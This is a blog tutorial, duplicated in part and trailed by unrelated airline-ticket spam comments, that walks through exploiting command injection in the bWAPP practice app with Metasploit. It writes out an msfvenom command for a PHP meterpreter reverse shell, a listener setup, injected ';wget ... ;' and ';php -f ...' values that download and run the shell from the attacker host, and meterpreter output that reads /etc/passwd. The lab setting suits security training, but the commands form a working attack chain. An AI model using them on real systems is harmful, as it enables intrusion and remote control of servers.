Metasploit is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.(wiki)
In this post we will use metasploit tool and spot command injection vulnerabilities in bWAPP. Our goal is to place a shell in application directory and execute the same, gets a reverse connection.
Step 1: - First we create a “php shell” with msfvenom(combination of Msfpayload and Msfencode). Execute following command in terminal(From metaspolit installation/apps).Below command generates a file phpshell.php.( payload which is used in later steps).
[zytham@s158519-vm app]$ ls
gem msfbinscan msfd msfirb msfpescan msfrpcd msfvenom
irb msfconsole msfelfscan msfmachscan msfrpc msfupdate ruby
[zytham@s158519-vm app]$ sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php
[sudo] password for zytham:
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1291 (iteration=0)
php/base64 chosen with final size 1291
Payload size: 1291 bytes
Step 2: - Now edit this phpshell.php file and enclose its content under php tag as shown below.
Step 3:- Setup a web-Server and place the phpshell at that location. We can setup a webserver using following command. Execute following command in terminal where we have placed phpshell file.
[zytham@s158519-vm CIV]$ sudo python -m SimpleHTTPServer 8088
[sudo] password for zytham:
Serving HTTP on 0.0.0.0 port 8088 ...
Step 4:- Set up a meterpreter listener on our machine (Here we have setup listener on same IP as hosted this phpshell.php) Execute following command from metaspoilt installation directory (from apps directory).On success we get into Metasploit console window.
[zytham@s158519-vm app]$ sudo ./msfconsole
[sudo] password for zytham:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v4.13.25-dev ]
+ -- --=[ 1625 exploits - 925 auxiliary - 282 post ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
Step 5:- Execute following command and setup meterpreter listener. Output of commands has been shown in below screenshot.
Step 6:- Copy (download) phpshell.php created locally to Web application server node using following command in command injection html UI.
Same can verified by executing following command (shown in screenshot)
Step 7:- Now execute following command via application (DNS lookup text box) and make a reverse connection by executing script placed in previous step.On successful connection we obtain meterpreter terminal.
Below are the terminal changes when above command is executed successfully in UI(DNS lookup)
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.213.142:7654
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.213.142
[*] Meterpreter session 1 opened (192.168.213.142:7654 -> 192.168.213.142:49944) at 2017-04-10 23:21:59 +0530
meterpreter >
From above we can see that we can successfully execute OS command once shell is executed successfully and reverse connection is obtained.
In this post we will use metasploit tool and spot command injection vulnerabilities in bWAPP. Our goal is to place a shell in application directory and execute the same, gets a reverse connection.
Step 1: - First we create a “php shell” with msfvenom(combination of Msfpayload and Msfencode). Execute following command in terminal(From metaspolit installation/apps).Below command generates a file phpshell.php.( payload which is used in later steps).
sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php
[zytham@s158519-vm app]$ ls
gem msfbinscan msfd msfirb msfpescan msfrpcd msfvenom
irb msfconsole msfelfscan msfmachscan msfrpc msfupdate ruby
[zytham@s158519-vm app]$ sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php
[sudo] password for zytham:
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1291 (iteration=0)
php/base64 chosen with final size 1291
Payload size: 1291 bytes
Step 2: - Now edit this phpshell.php file and enclose its content under php tag as shown below.
Step 3:- Setup a web-Server and place the phpshell at that location. We can setup a webserver using following command. Execute following command in terminal where we have placed phpshell file.
sudo python -m SimpleHTTPServer 80
[zytham@s158519-vm CIV]$ sudo python -m SimpleHTTPServer 8088
[sudo] password for zytham:
Serving HTTP on 0.0.0.0 port 8088 ...
Check for server is running and shell is listing.
[zytham@s158519-vm app]$ sudo ./msfconsole
[sudo] password for zytham:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v4.13.25-dev ]
+ -- --=[ 1625 exploits - 925 auxiliary - 282 post ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
Step 5:- Execute following command and setup meterpreter listener. Output of commands has been shown in below screenshot.
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.213.141
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
msf exploit(handler) > set LHOST 192.168.213.141
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Step 6:- Copy (download) phpshell.php created locally to Web application server node using following command in command injection html UI.
;wget http://192.168.213.142:8088/phpshell.php -O /tmp/phpshell.php;
Same can verified by executing following command (shown in screenshot)
;ls -l /tmp/ phpshell.php
Step 7:- Now execute following command via application (DNS lookup text box) and make a reverse connection by executing script placed in previous step.On successful connection we obtain meterpreter terminal.
;/opt/lampp/bin/php -f /tmp/phpshell.php
Below are the terminal changes when above command is executed successfully in UI(DNS lookup)
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.213.142:7654
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.213.142
[*] Meterpreter session 1 opened (192.168.213.142:7654 -> 192.168.213.142:49944) at 2017-04-10 23:21:59 +0530
meterpreter >
meterpreter > sysinfo
Computer : s158519-vm.localvm.com
OS : Linux s158519-vm.localvm.com 3.10.0-327.4.4.el7.x86_64 #1 SMP Tue Jan 5 16:07:00 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > pwd
/opt/lampp/htdocs/vulnerable-web
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
Computer : s158519-vm.localvm.com
OS : Linux s158519-vm.localvm.com 3.10.0-327.4.4.el7.x86_64 #1 SMP Tue Jan 5 16:07:00 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > pwd
/opt/lampp/htdocs/vulnerable-web
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...........................
From above we can see that we can successfully execute OS command once shell is executed successfully and reverse connection is obtained.
Tags:
DataSecurity
Aivivu - đại lý vé máy bay, tham khảo
ReplyDeletevé máy bay đi Mỹ tháng nào rẻ nhất
giá vé máy bay tết
ve may bay di Phap gia re
vé máy bay sang anh
vé máy bay giá rẻ 99k
giá vé máy bay đi San Francisco
vé máy bay đi Los Angeles giá rẻ 2020
combo vinpearl phú quốc vé máy bay
combo du lịch đà nẵng tháng 7
Mua vé máy bay tại Aivivu, tham khảo
ReplyDeletevé máy bay đi Mỹ tháng nào rẻ nhất
mua vé máy bay từ mỹ về việt nam hãng eva
ve may bay tu anh ve viet nam
máy bay từ pháp về việt nam